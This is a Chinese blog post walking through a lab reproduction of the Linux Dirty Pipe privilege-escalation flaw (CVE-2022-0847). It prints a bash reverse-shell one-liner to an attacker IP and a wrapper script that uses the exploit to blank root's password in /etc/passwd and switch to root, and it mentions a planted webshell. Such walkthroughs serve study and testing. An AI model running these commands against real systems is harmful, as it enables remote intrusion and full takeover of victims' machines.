Linux内核提权漏洞(Dirty-pipe)复现_linux提权漏洞

已于 2024-01-17 18:26:44 修改
阅读量125 收藏 2
点赞数
文章标签: linux 网络 运维
于 2023-10-04 09:35:50 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53058639/article/details/133544239
版权

前言:CVE-2022-0847 是存在于 Linux内核 5.8 及之后版本中的本地提权漏洞。攻击者通过利用此漏洞,可覆盖重写任意可读文件中的数据,从而可将普通权限的用户提升到特权 root。 CVE-2022-0847 的漏洞原理类似于 CVE-2016-5195 脏牛漏洞(Dirty Cow),但它更容易被利用。漏洞作者将此漏洞命名为“Dirty Pipe”。

影响版本:

5.8 <= Linux内核版本 <5.16.11 / 5.15.25 / 5.10.102

0x01 环境部署

  1. 系统版本: Ubuntu 21.10
  2. 系统内核: Linux m1key 5.13.0-16-generic #16-Ubuntu SMP Fri Sep 3 14:53:27 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
  3. 靶机IP:192.168.2.115
  4. 提前安装好apache等组件,在网站根目录上写一个一句话木马。

0x02 连接webshell反弹shell

1、查看靶机上的webshell内容。

2、使用蚁剑连接webshell,打开tmp目录,将准备好的提权exp和反弹shell脚本上传到/tmp目录下。

其中re.sh的内容为:bash -i >& /dev/tcp/192.168.2.1/12345 0>&1.
exp为可执行的提权程序。由于利用方式有点繁琐,所以单独写一个2.sh调用exp来进行一个提权的操作。

3、打开蚁剑虚拟终端,给刚上传上去的三个文件加个权限。
chmod 777 /tmp/*

4、攻击机监听本地端口12345,蚁剑虚拟终端执行bash re.sh

0x03 提权

1、反弹shell之后,就可以执行提权程序了。

2、可以看到我们已经成功获取了root权限。

3、我们可以看看2.sh里面的内容分析一下。

# 备份密码文件
rm -f /tmp/passwd
cp /etc/passwd /tmp/passwd
if [ -f "/tmp/passwd" ];then
 echo "/etc/passwd已备份到/tmp/passwd"
 passwd_tmp=$(cat /etc/passwd|head)
 ./exp /etc/passwd 1 "${passwd_tmp/root:x/oot:}"

 echo -e "\n# 恢复原来的密码\nrm -rf /etc/passwd\nmv /tmp/passwd /etc/passwd"

 # 现在可以无需密码切换到root账号
 su root
else
 echo "/etc/passwd未备份到/tmp/passwd"
 exit 1
fi

先将/etc/passwd文件复制到当前目录,然后利用EXP修改系统的passwd文件使其不用密码就能登录,然后直接su到root,然后再将之前的passwd替换回去,所谓神不知鬼不觉,非常好用。

0x04 获取源码

  1. 由于该exp比较敏感,所以无法公布,想要的小伙伴可以联系我企鹅群获取。
  2. 相关视频链接:https://www.bilibili.com/video/BV1SZ4y1r74E/?spm_id_from=333.999.0.0&vd_source=913edb0b204c3345e9e76e1981bc8198

网络安全工程师(白帽子)企业级学习路线

第一阶段:安全基础(入门)

img

第二阶段:Web渗透(初级网安工程师)

img

第三阶段:进阶部分(中级网络安全工程师)

img

如果你对网络安全入门感兴趣,那么你需要的话可以点击这里👉网络安全重磅福利:入门&进阶全套282G学习资源包免费分享!

学习资源分享

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

程序员小肖
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Linux内核漏洞浅析
03-04
拒绝服务攻击是目前比较流行的攻击方式,它并不取得服务器权限,而是使服务器崩溃或失去响应。对Linux的拒绝服务大多数都无须登录即可对系统发起拒绝 服务攻击,使系统或相关的应用程序崩溃或失去响应能力,这种方式属于利用系统本身漏洞或其守护进程缺陷及不正确设置进行攻击。由于tcp/ip本身的缺陷,导致很多操作系统都存在tcp/ip堆栈漏洞,使攻击者进行ip地址欺骗非常容易实现。Linux也不例外。虽然IP地址欺骗不会对Linux服务器本身造成很严重的影响,但是对很多利用Linux为操作系统的防火墙和IDS产品来说,这个漏洞却是致命的。
linux漏洞分析,linux一个漏洞的分析
weixin_31417633的博客
05-13 304
程序最早是国外的大佬写的。这个漏洞的原理非常简单,就是利用coredump的时候,可以在/etc/cron.d目录下生成core文件。而在/etc/cron.d目录下的文件,crontab会定时以指定的用户权限来执行。如果在core文件中,指定用户权限是root,那么就能够以我们希望的方式来运行所有的程序了。下面就程序进行分析。#include #include #include #include...
linux漏洞,「漏洞通告」Linux Kernel 信息泄漏&权限提升漏洞(CVE-2020-8835)
weixin_42337065的博客
05-17 551
阅读:1,374一、漏洞概述3月31日,选手Manfred Paul在Pwn2Own比赛上用于演示Linux内核权限提升的漏洞被CVE收录,漏洞编号为CVE-2020-8835。此漏洞由于bpf验证系统在Linux内核中没有正确计算某些操作的寄存器限制,导致本地攻击者可以利用此缺陷越界读取机密信息(内核内存)或将用户提升为管理权限。请相关用户采取措施进行防护。参考链接:二、影响范围LinuxKe...
linux一个漏洞的分析
洋葱的专栏
11-28 1158
程序最早是国外的大佬写的。这个漏洞的原理非常简单,就是利用coredump的时候,可以在/etc/cron.d目录下生成core文件。而在/etc/cron.d目录下的文件,crontab会定时以指定的用户权限来执行。如果在core文件中,指定用户权限是root,那么就能够以我们希望的方式来运行所有的程序了。下面就程序进行分析。 #include #include #include #in
Linux漏洞公告 | Linux内核漏洞CVE-2020-14386安全更新
shanxun1012的专栏
05-05 293
升级-Centos Yum Security Update只更新安全补丁//只安装最安全的安全更新,忽略所有可能包含不安全新功能的包。
新版脏牛Linux内核提权漏洞CVE-2022-0847
03-09
5.8 <= Linux kernel 中的一个漏洞,它允许覆盖任意只读文件中的数据。这会导致权限提升,因为非特权进程可以将代码注入根进程。 修复版本:Linux 5.16.11、5.15.25 和 5.10.102 中修复。
CVE-2016-8655 Linux内核提权漏洞POC
11-18
CVE-2016-8655 Linux内核提权漏洞POC
linux内核自动提权脚本.zip
02-01
linxu内核自动提权脚本,涵盖了大部内内核exp,自动判断并运行相应代码,linxu内核自动提权脚本,涵盖了大部内内核exp,自动判断并运行相应代码,
ubuntu内核linux-modules--generic_5.7.10-050710.202007220834_amd64.deb)
07-26
下载之后可以直接点击安装,不用通过命令行窗口,推荐安装顺序1.headers-...查看ubuntu内核版本:uname -r; ubuntu安装后无法连接WIFI(尤其是比较新的电脑)可以升级内核试试 没能同时上传四个文件,其余三个也以上传
Linux提权手法总结以及 Linux提权exp集合
02-22
Linux常见提权总结包括(内核漏洞提权、suid提权、定时任务提权、sudo提权等等)
linux系统漏洞加固
04-18
一. 账号口令 1.1 检查设备密码复杂度策略(高危) 1.2 检查口令最小长度(高危) 1.3 检查是否设置口令更改最小间隔天数(高危) 1.4 检查是否设置口令生存周期(高危) 1.5 检查是否设置口令过期前警告天数(高危) 1.6 检查是否存在空口令账号(高危) 1.7 检查是否设置除root之外UID为0的用户(中危) 二. 认证授权 2.1 检查用户目录缺省访问权限设置(高危) 2.2 检查用户umask设置(中危) 2.3 检查重要文件属性设置(中危) 2.4 检查重要目录或文件权限设置(中危) 2.5 检查是否设置ssh登录前警告Banner(低危) 三. 日志审计 3.1 检查是否对登录进行日志记录(高危) 3.2 检查是否启用cron行为日志功能(低危) 3.3 检查是否配置su命令使用情况记录(低危) 3.4 检查日志文件是否非全局可写(低危) 3.5 检查安全事件日志配置(低危) 3.6 检查是否记录用户对设备的操作(低危) 3.7 检查是否配置远程日志功能(低危) 四. 协议安全 4.1 检查是否禁止root用户远程登录(高危) 4.2 检查是否禁止匿名用户登录FTP(高危) 4.3 检查使用IP协议远程维护的设备是否配置SSH协议,禁用telnet协议(高危) 4.4 检查是否修改snmp默认团体字(中危) 4.5 检查系统openssh安全配置(中危) 4.6 检查是否禁止root用户登录FTP(中危) 五. 其他安全 5.1 检查是否使用PAM认证模块禁止wheel组之外的用户su为root(高危) 5.2 检查是否设置命令行界面超时退出(高危) 5.3 检查是否关闭不必要的服务和端口(高危) 5.4 检查是否关闭系统信任机制(高危) 5.5 检查是否删除了潜在危险文件(高危) 5.6 检查系统core dump设置(中危) 5.7 检查root用户的path环境变量(中危) 5.8 检查系统是否禁用ctrl+alt+del组合键(中危) 5.9 检查密码重复使用次数限制(中危) 5.10 检查是否配置用户所需最小权限(中危) 5.11 检查系统内核参数配置(中危) 5.12 检查FTP用户上传的文件所具有的权限(低危) 5.13 检查/usr/bin/目录下可执行文件的拥有者属性(低危) 5.14 检查是否按用户分配账号(低危) 5.15 检查历史命令设置(低危) 5.16 检查系统磁盘分区使用率(低危) 5.17 检查日志文件权限设置(低危) 5.18 检查是否设置系统引导管理器密码(低危) 5.19 检查是否限制FTP用户登录后能访问的目录(低危) 5.20 检查是否设置ssh成功登录后Banner(低危) 5.21 检查是否使用NTP(网络时间协议)保持时间同步(低危) 5.22 检查是否关闭IP伪装和绑定多IP功能(低危) 5.23 检查是否限制远程登录IP范围(低危) 5.24 检查NFS(网络文件系统)服务配置(低危) 5.25 检查拥有suid和sgid权限的文件(低危) 5.26 检查是否配置定时自动屏幕锁定(适用于具备图形界面的设备)(低危) 5.27 检查是否安装chkrootkit进行系统监测(低危) 5.28 检查是否对系统账号进行登录限制(低危) 5.29 检查是否禁用不必要的系统服务(低危) 5.30 检查别名文件/etc/aliase(或/etc/mail/aliases)配置(低危) 5.31 检查账户认证失败次数限制(低危) 5.32 检查telnet Banner 设置(低危) 5.33 检查FTP Banner设置(低危) 5.34 检查是否关闭数据包转发功能(适用于不做路由功能的系统)(低危) 5.35 检查是否安装OS补丁(低危) 5.36 检查是否按组进行账号管理(低危) 5.37 检查是否删除与设备运行、维护等工作无关的账号(低危)
Linux 漏洞扫描
ITmoster的博客
07-19 1350
Vulnerability Manager Plus是一个端到端的漏洞管理和合规检查解决方案,支持多个操作系统,提供内置的修复程序,通过统一的控制台,对风险和漏洞进行全面扫描、持续监测、严格评估,和完整修复。
linux 权限漏洞,Linux权限漏洞及其解决
weixin_33557333的博客
04-30 251
Linux文件权限漏洞,只要目录具有写的权限,其下的文件都可以强制写,所以不要轻易把写的权限给一个目录。以root用户登录创建目录bbbb[root@serv01 learning] mkdir bbbb[root@serv01 learning]# chmod 777 bbbb/[root@serv01 learning]# ll bbbb/ -ddrwxrwxrwx. 2 root root ...
【已复现Linux Kernel权限提升漏洞(CVE-2023-3269)安全风险通告
最新发布
smellycat000的专栏
08-10 475
●点击↑蓝字关注我们,获取更多安全风险通告漏洞概述漏洞名称Linux Kernel 权限提升漏洞漏洞编号QVD-2023-15242、CVE-2023-3269公开时间2023-07-05影响对象数量级万级奇安信评级高危CVSS 3.1分数7.8威胁类型权限提升利用可能性中POC状态已公开在野利用状态未发现EXP状态已公开技术细节状态已公开利用条件:需要本地低权限触发。(注:奇安信CERT的漏洞...
速修复!Linux 内核严重漏洞影响所有 Linux 配置
smellycat000的专栏
07-07 651
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士今年六月中旬,一名安全研究员发现并向 Linux 管理员报告了一个位于 Linux 内核中的一个严重漏洞 (CVE-2023-3269),它影响 Linux 内核6.1至6.4,可使攻击者在受影响系统上提升权限。影响所有 Linux 配置北京大学的安全研究员 Ruihan Li 发现了该漏洞,并表示它影响几乎所有 Linux 内核配置且触发仅需最...
Linux sudo权限提升漏洞复现(CVE-2021-3156)
deng_menglihua的博客
04-19 350
Linux sudo权限提升漏洞复现(CVE-2021-3156) 1.简介 sudo是linux系统管理指令,是允许系统管理员让普通用户执行root命令的一个工具。 2.漏洞概述 编号:CVE-2021-3156 在sudo解析命令行参数的方式中发现了基于堆的缓冲区溢出。任何本地用户都可以利用此漏洞,不需要进行身份验证,也不用知道用户的密码。利用成功可以获得root权限。 3.影响版本 sudo 1.9.0 到 1.9.5p1 所有版本 sudo 1.8.2 到 1.8.31p2 所有版本 4.环
Linux漏洞处理
张金玉的专栏
06-03 735
wget https://cdn.openbsd.org/pub/OpenBSD/OpenSSH/portable/openssh-8.2p1.tar.gz wget http://www.zlib.net/zlib1211.zip wget https://www.openssl.org/source/openssl-1.1.1f.tar.gz ------------------------------------------------------------ [root@kolla mySSH]#
Linux kernel(CVE-2018-17182)提权漏洞复现
06-12
为了避免对网络安全造成不必要的威胁,我无法提供具体的漏洞复现步骤。但是,我可以简单地描述一下CVE-2018-17182漏洞的一般性质和可能的攻击方式。 CVE-2018-17182是Linux内核中的一种提权漏洞,攻击者可以利用该漏洞以root权限在系统中执行任意代码。这个漏洞的原因是一个名为"Race Condition"(竞争条件)的问题,通过在内核中利用这个问题,攻击者可以覆盖内核内存中的关键数据结构,以此来控制系统的行为。 攻击者可以通过构造恶意的程序或者利用已存在的软件漏洞来利用该漏洞。因此,为了保护系统的安全,我们应该尽可能保持系统和软件的更新,并采取一系列的安全措施,例如限制用户的权限、使用安全的密码策略等等。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值